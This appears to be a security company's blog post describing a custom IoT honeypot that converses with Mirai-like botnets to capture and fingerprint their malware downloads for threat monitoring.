Chatting With IoT Bots
After the Dyn attack by Mirai in October 2016, we knew we were facing an infliction point which would reshape the DDoS threat landscape for the coming months or years. The Internet of Things (IoT) would become an important part of that new landscape. After the attack, the inadequate security state of IoT and the unsophisticated nature of the botnets exploiting IoT devices such as IP cameras, DVRs and routers became apparent and the center of attention of many security researchers and reporters. IoT became the playground for many new bots and slowly turned into a battleground where bad bots, white-hat bots and vigilante bots are battling for ever-growing numbers of poorly designed and insecure devices.
By December 2016 the number of botnets was growing. Their sizes were reaching beyond the hundreds of thousands, with a potential for nearly 1 million bots if the DT takeover attempt in November 2016 wouldn’t have resulted in 900,000 residential internet modems refusing operation after the TR-069 exploit. IoT became a major weapon for DDoS, and it is time for us to start to measure the threat and monitor for new and evolving exploits used by IoT botnets.
Because of the aggressive scanning and harvesting method used by Mirai, and the sheer number of botnets reported in past nine months, it should not take long for an unprotected, insecure device to be exploited and victimized once it is connected to the internet. Unless your IP is part of the excluded ranges, hardcoded in the original Mirai, including the U.S. Postal Service, the Department of Defense, the Internet Assigned Numbers Authority (IANA) and IP ranges belonging to Hewlett-Packard and General Electric, any internet connection, wherever it is located, residential or not, should see regular attempts of infection by Mirai and friends. Early January was the time we started to deploy some sensors to get a feel of how bad it actually was. So we started out with a very simple, custom-developed telnet server listening on port 23 who accepted any username and password combination and would present what looks like a shell or command line interface to the remote peer. While tracking initial connections, we found that there was less than 10 minutes between any two connections from bots trying to compromise our node. This number by now has shrunk to three to five minutes between any two compromise attempts.
Given this regular activity, we set out to create a chatterbot (which we conveniently called our IoT honeypot) which would have a meaningful dialog with the bots, with the goal to trigger them to reveal their malware binary. Some bots expect certain responses from the issued commands and upon failure to provide them they would disappear. Because there was no shortage of new attempts, we were able to iteratively build a consistent dialog with most bots and keep the dialog going until the offending peer shows its true colors and provides us with the location of its malware binary, typically represented by a wget or ftp/tftp command.
As one would expect, most of the dropper command sequences were consistent and showed many similarities, with the exception of some randomized tokens and binary download locations. By concatenating and normalizing the bot’s command sequence and hashing it we were able to create a fingerprint that uniquely identifies families of similar bots.
[You might also like: Everything You Need to Know About Brickerbot, Hajime, and IoT Botnets]
Once the bots felt confident to share with our honeypot the location to download the malware binary, we added some functionality to the honeypot to go fetch the binary and download it in memory so we can run hashes on the contents to create a malware fingerprint. New fingerprints, unknown by the honeypot, are further analyzed through submitting the md5 and sha256 hashes on virustotal.com, and if it is a new or unknown malware it is submitted to virustotal and we have a good candidate for further study. The file fingerprints are a great tool to help identify identical bots with malware binaries that are evolving over time, such as Hajime. The command sequence fingerprint matches the one of Hajime, but the binary file fingerprints are changing in time, which allows us to track new versions delivered by the same bot.
Information about the remote peer, including geoip data, the original command sequence and the command sequence fingerprint as well as the malware binary fingerprint are stored in MongoDB for analysis. Through querying the data in MongoDB we are able to track the history and evolution of existing and new bots that were trying to compromise our honeypots. Over time we added support for new protocols and exploits such as the TR-064/069 server and the NewNTPServer exploit, the HTTP go-ahead RCE exploits, and general SSH – simulating real devices as close as possible and trick the bots into believing they have a real new victim to work with.
The most recent addition to our IoT honeypot infrastructure is an ELK stack (Elasticsearch, Logstash, Kibana) that provides us real time dashboards and insights on IoT botnet activity in our honeypots.
The use of a chatterbot pattern for the honeypot provides a safer and more robust detection tool that provides a lot of flexibility in terms of fingerprinting and analyzing the activity. None of the bot’s commands are actually executed by the honeypot, only known and pre-programmed requests are generating pre-programmed responses. Because of the high number of infection attempts per hour, this design pattern worked out well while studying and gathering data on IoT threats and botnets. The honeypot is not comparable to a more traditional telnet/SSH honeypots in the sense that it does not allow for unanticipated or non-programmed commands and responses. Other honeypots expose real shell functionality and allow more creativity from the attacking peer, and in doing so provides a great method for studying new attacker behavior. The IoT honeypot does not provide such freedom and creativity, and while able to discover new kinds of bots and dropper attempts, the honeypot requires work to program and simulate new commands, protocols and exploits. For all intents and purposes of our study, the honeypot provides us the right tools and statistics we need to better understand and appreciate the threat landscape comprised by IoT botnets.